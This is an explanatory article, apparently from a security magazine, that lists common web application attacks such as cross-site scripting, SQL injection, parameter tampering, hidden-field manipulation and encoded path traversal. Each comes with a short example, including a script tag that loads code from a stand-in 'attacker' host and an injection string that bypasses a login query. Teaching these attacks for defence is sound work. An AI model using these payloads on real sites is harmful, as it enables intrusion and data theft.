- Mike Bobbitt
Default Web server installs, no matter the make or model, are susceptible to a plethora of attacks that other services need not be concerned with. Many of these attacks are so simple to launch that anyone with a browser can unleash them. Others require intimate knowledge of the host server and underlying applications. All are potentially damaging to an organization's Web presence.
Obviously, not all of the following attacks work all of the time. However, despite the fact that all of these threats have been well known and documented, new and vulnerable Web sites continue to pour onto the Internet.
- Cross-Site Scripting: Malicious code, commonly in the form of a <SCRIPT> tag added to a URL is executed when a user clicks on the URL.
Example: <ahref=http://www.infosecuritymag.com?bogus=<SCRIPT SRC='http://attacker/script'>Click Me!</a>
- Application Buffer Overflow: Very long requests sent to the application exceed the allocated buffers and allow arbitrary code to be placed into the execution stream.
Example: <input type="text" maxlen="10000000" value="ioH*Y$P;...">
- Cookie Poisoning: Changing a cookie's contents to obtain unauthorized information from the server.
Example: Changing the username stored in a cookie to access other users' records.
- Hidden Field Manipulation: Changing the values of hidden fields, which are frequently used to provide status information to the server.
Example: <input type="hidden" name="price" value="69.99"> changed to <input type="hidden" name="price" value="0.01"> changes the price of an item on a Web-based order form.
- Stealth Commanding: Modifying Web form input fields to coerce the Web server into actions it wouldn't ordinarily allow.
Example: Inserting a script into a text box, allowing it to be executed when the text box is displayed back to the user (for confirmation, for example).
- Forceful Browsing: Modifying URL to bypass Web controls.
- Parameter Tampering: Submitting modified data to the Web server.
Example: <http://mysite/dbaccess.cgi?memberid=466326> changed to <http://mysite/dbaccess.cgi?memberid=*> returns all member records in the database.
- Third-Party Misconfiguration: Exploiting an insecure default (or bad) server configuration.
Example: Attempting to use default passwords to gain access to Web applications.
- Known Vulnerabilities: Exploiting known vulnerabilities that haven't been patched.
Example: Exploiting IIS vulnerabilities on a "vanilla" installation before it's patched.
- Backdoor and Debug Options: Exploiting functions intended for development testing that haven't been removed or disabled.
- Database Sabotage: Appending valid SQL commands to form fields.
Example: On a Web form, if user "bobbitt" enters "mypassword" in the password field, the underlying SQL query might look like this: select * from users where username='bobbitt' and password='mypassword.' However, if an attacker enters "anyoldthing' or '1'='1" in that same password field, the SQL query changes to this: select * from users where username='bobbitt' and password='anyoldthing' or '1'='1' In this situation, 1 is always equal to 1, so the logic of the SQL query is short-circuited, and unauthorized access is obtained.
- Data Encoding: Disguising attacks by using alternate encoding methods.
Example: inserting "%2E%2E%2F" into a URL to hide "../" backtracking requests.
- Protocol Piggybacking: Modifying the application protocol structure.
Example: Inserting a specially crafted proxy-authorization header into an HTTP request.